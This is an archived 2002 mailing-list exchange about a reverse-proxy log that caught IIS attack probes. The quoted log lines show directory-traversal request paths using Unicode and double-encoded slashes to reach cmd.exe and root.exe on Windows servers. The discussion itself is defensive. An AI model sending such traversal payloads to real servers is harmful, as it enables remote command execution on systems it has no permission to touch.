Either that, or some script kiddie is trying out one of the many exploits on your site... not smart enough to realize that he's not hitting an IIS server. - Herman On Fri, 11 Oct 2002 mailinglists@belfin.ch wrote: ->Hello -> ->our reverse proxy picked this up -> ->1034211881.427 22 217.11.99.90 TCP_MISS/503 1166 GET ->http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - NONE/- - ->1034211881.925 13 217.11.99.90 TCP_MISS/503 1166 GET ->http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - NONE/- - ->1034211882.393 19 217.11.99.90 TCP_MISS/503 1166 GET ->http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- - ->1034211882.852 10 217.11.99.90 TCP_MISS/503 1166 GET ->http://www/scripts/..%c1%9c../winnt/system32/cmd.exe? - NONE/- - ->1034211883.297 5 217.11.99.90 TCP_MISS/503 1168 GET ->http://www/scripts/..%%35%63../winnt/system32/cmd.exe? - NONE/- - ->1034211883.836 20 217.11.99.90 TCP_MISS/503 1164 GET ->http://www/scripts/..%%35c../winnt/system32/cmd.exe? - NONE/- - ->1034211887.664 22 217.11.99.90 TCP_MISS/503 1172 GET ->http://www/scripts/..%25%35%63../winnt/system32/cmd.exe? - NONE/- - ->1034211888.285 19 217.11.99.90 TCP_MISS/503 1164 GET ->http://www/scripts/..%252f../winnt/system32/cmd.exe? - NONE/- - ->1034215688.223 16 217.11.99.90 TCP_MISS/503 1116 GET ->http://www/scripts/root.exe? - NONE/- - ->1034215689.027 29 217.11.99.90 TCP_MISS/503 1112 GET ->http://www/MSADC/root.exe? - NONE/- - ->1034215689.564 13 217.11.99.90 TCP_MISS/503 1132 GET ->http://www/c/winnt/system32/cmd.exe? - NONE/- - ->1034215690.138 3 217.11.99.90 TCP_MISS/503 1132 GET ->http://www/d/winnt/system32/cmd.exe? - NONE/- - ->1034215690.962 20 217.11.99.90 TCP_MISS/503 1164 GET ->http://www/scripts/..%255c../winnt/system32/cmd.exe? - NONE/- - ->1034215691.552 27 217.11.99.90 TCP_MISS/503 1206 GET ->http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - ->NONE/- - ->1034215692.265 19 217.11.99.90 TCP_MISS/503 1206 GET ->http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - ->NONE/- - ->1034215693.017 10 217.11.99.90 TCP_MISS/503 1262 GET ->http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c. ->./winnt/s -> ->Is there some new IIS/Windows worm spreading? -> ->Thanks, ->Philipp -> ->